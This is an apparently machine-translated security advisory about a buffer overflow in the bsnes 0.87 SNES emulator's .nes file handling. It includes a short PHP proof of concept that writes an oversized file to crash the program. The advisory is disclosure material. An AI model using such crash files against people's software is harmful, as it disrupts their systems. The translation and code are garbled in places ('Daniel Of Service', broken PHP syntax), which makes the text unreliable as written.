Bsnes '. nes' File Processing Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Byuu bsnes 0.87
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53684

Bsnes are SNES Simulators Based on Linux, Mac OS X, and Windows.

Bsnes 0.87 has a buffer overflow vulnerability in processing '. nes' files. Attackers can exploit this vulnerability to execute arbitrary code in affected applications.

<* Source: Pr0T3cT10n (pr0t3ct10n@gmail.com)
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

<? Php
# Bsnes v0.87 Local Daniel Of Service
# Tested on Windows 7 64Bit
# Software Site: http://byuu.org/bsnes/
# Software Download: http://www.emulator-zone.com/download.php/emulators/snes/bsnes/bsnes_v087-64bit.7z
# Author: Pr0T3cT10n
######################################## ##########################
# Bsnes v0.87 is vulnerable to local denial of service attack.
# When we try to open a file by 'catridge '-> 'Load NES Catridge'
# That contains 9999 chars ('A'), so bsnes shoshould crash.
######################################## ##########################
# PoC/Code:
$ Buffer = str_repeat ('A', 9999); # Create 9999 chars ('A ')..
If (file_put_contents ('crash. nes ', $ buffer )){
Echo ("File created successfuly. \ r \ bsnes shoshould crash when you open the file with it. \ r \ n ");
} Else {
Echo ("Can't create file. Please try again. \ r \ n ");
}
# Cya :)
# 0x31337.net
####################
?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Byuu
----
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://byuu.org/bsnes/